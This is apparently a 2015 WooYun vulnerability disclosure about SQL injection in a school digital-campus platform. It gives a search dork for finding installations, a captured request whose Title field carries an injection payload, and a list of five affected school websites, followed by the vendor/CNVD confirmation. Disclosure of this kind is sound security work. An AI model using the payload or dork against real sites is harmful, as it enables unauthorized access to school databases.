当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105378

漏洞标题:某通用数字化校园平台#SQL3

相关厂商:浙江皓翰科技有限公司

漏洞作者: 路人甲

提交时间:2015-04-02 15:55

修复时间:2015-07-06 13:00

公开时间:2015-07-06 13:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-07: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向第三方安全合作伙伴开放
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

RT

详细说明:

关键词:inurl:IneduPortal/index.aspx

0122495453bd170aeb11c3ee3f9750409d0b27c5.png


厂商:浙江皓翰科技有限公司
官网:http://www.yuysoft.com/index.asp


文件:Resource/search/search.aspx
抓包:

__VIEWSTATE=%2FwEPDwULLTEwOTQxMzIyNjcPZBYCAgEPZBYKAgEPZBYCZg8WAh4HVmlzaWJsZWhkAgcPFgIeCWlubmVyaHRtbAXRBjxGT05UIGZhY2U9IuWui%2BS9kyI%2BPC9GT05UPg0KCQkJCQkJCQkJCQkJCQkJPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfZ3JhJyB2YWx1ZT0nMSc%2BIOaJgOacieW5tOe6pzxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2dyYScgdmFsdWU9JzInPiDkuIDlubTnuqfkuIo8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19ncmEnIHZhbHVlPSczJz4g5LqM5bm057qn5LiKPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfZ3JhJyB2YWx1ZT0nNCc%2BIOS4ieW5tOe6p%2BS4ijxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2dyYScgdmFsdWU9JzUnPiDlm5vlubTnuqfkuIo8YnI%2BPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfZ3JhJyB2YWx1ZT0nNic%2BIOS6lOW5tOe6p%2BS4ijxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2dyYScgdmFsdWU9JzcnPiDlha3lubTnuqfkuIo8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19ncmEnIHZhbHVlPSc4Jz4g5LiA5bm057qn5LiLPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfZ3JhJyB2YWx1ZT0nOSc%2BIOS6jOW5tOe6p%2BS4izxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2dyYScgdmFsdWU9JzEwJz4g5LiJ5bm057qn5LiLPGJyPjxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2dyYScgdmFsdWU9JzExJz4g5Zub5bm057qn5LiLPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfZ3JhJyB2YWx1ZT0nMTInPiDkupTlubTnuqfkuIs8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19ncmEnIHZhbHVlPScxMyc%2BIOWFreW5tOe6p%2BS4i2QCCw8WAh8BBe8EPEZPTlQgZmFjZT0i5a6L5L2TIj48L0ZPTlQ%2BDQoJCQkJCQkJCQkJCQkJCQk8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19jb3UnIHZhbHVlPScxJz4g6K%2Bt5paHPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfY291JyB2YWx1ZT0nMic%2BIOaVsOWtpjxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2NvdScgdmFsdWU9JzMnPiDoi7Hor608aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19jb3UnIHZhbHVlPSc0Jz4g6Z%2Bz5LmQPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfY291JyB2YWx1ZT0nNSc%2BIOe%2Bjuacrzxicj48aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19jb3UnIHZhbHVlPSc2Jz4g56eR5a2mPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfY291JyB2YWx1ZT0nNyc%2BIOS9k%2BiCsjxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX2NvdScgdmFsdWU9JzgnPiDlk4HlvrfkuI7nlJ%2FmtLs8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19jb3UnIHZhbHVlPSc5Jz4g5L%2Bh5oGv5oqA5pyvPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfY291JyB2YWx1ZT0nMTAnPiDogIPmoLjor4TlrprnsbtkAg0PFgIfAQXuAzxGT05UIGZhY2U9IuWui%2BS9kyI%2BPC9GT05UPg0KCQkJCQkJCQkJCQkJCQkJPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfdHlwJyB2YWx1ZT0nMSc%2BIOaVmeahiDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX3R5cCcgdmFsdWU9JzInPiDorrrmloc8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa190eXAnIHZhbHVlPSczJz4g57Sg5p2QPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfdHlwJyB2YWx1ZT0nNCc%2BIOivvuS7tjxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX3R5cCcgdmFsdWU9JzUnPiDor5Xpopg8YnI%2BPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfdHlwJyB2YWx1ZT0nNic%2BIOahiOS%2BizxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX3R5cCcgdmFsdWU9JzcnPiDmlZnlrabor4Tlrpo8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa190eXAnIHZhbHVlPSc4Jz4g5b636IKyZAIPDxYCHwEF4wU8Rk9OVCBmYWNlPSLlrovkvZMiPjwvRk9OVD4NCgkJCQkJCQkJCQkJCQkJCTxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrX21hcmt0eXAnIHZhbHVlPSc4Nic%2BIEHnsbvlrabliIYt5om%2F5ouF5Y%2BR6KiA5Lu75YqhPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfbWFya3R5cCcgdmFsdWU9JzkyJz4gQeexu%2BWtpuWIhi3lvrfogrI8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19tYXJrdHlwJyB2YWx1ZT0nMTAwJz4gQeexu%2BWtpuWIhi3mlZnlraY8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19tYXJrdHlwJyB2YWx1ZT0nMTEyJz4gQuexu%2BWtpuWIhi3np5HnoJQ8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2Noa19tYXJrdHlwJyB2YWx1ZT0nMTIxJz4gQuexu%2BWtpuWIhi3or7flgYc8YnI%2BPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfbWFya3R5cCcgdmFsdWU9JzEyNic%2BIELnsbvlrabliIYt5beu6ZSZ5LqL5pWFPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfbWFya3R5cCcgdmFsdWU9JzEyOCc%2BIELnsbvlrabliIYt6YCa6K6v5oql6YGTPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfbWFya3R5cCcgdmFsdWU9JzEzMSc%2BIEPnsbvlrabliIYt5pyJ5pWI5oqV6K%2BJPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGtfbWFya3R5cCcgdmFsdWU9JzEzMyc%2BIEPnsbvlrabliIYt5pWZ5bel5rS75Yqo5Y%2BK5q%2BU6LWbZGT7TchdvlHohaiLUXsq2IYn3MREPg%3D%3D&Title=%25%27+and+%40%40version%3E0+and+%27%25%27%3D%27&username=&KeyWord=&sDate=&eDate=&btnsearch=%CB%D1%CB%F7&__EVENTVALIDATION=%2FwEWBQLRpsu1BgLrgpfiDgKvpuq2CAK97eLVCQKln%2FOLAiXJmTed4X3zkVMK%2BFuKaf1a1B0o


参数:

Title和username没有过滤直接带入查询

漏洞证明:

相关案例:

http://www.hzlcyhxx.com/Resource/search/search.aspx
http://www.xfls.net/Resource/search/search.aspx
http://115.236.188.35/Resource/search/search.aspx
http://www.jianlan.com.cn/Resource/search/search.aspx
http://www.cpdxx.com/Resource/search/search.aspx


QQ图片20150402132959.jpg


QQ图片20150402133105.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-07 12:58

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论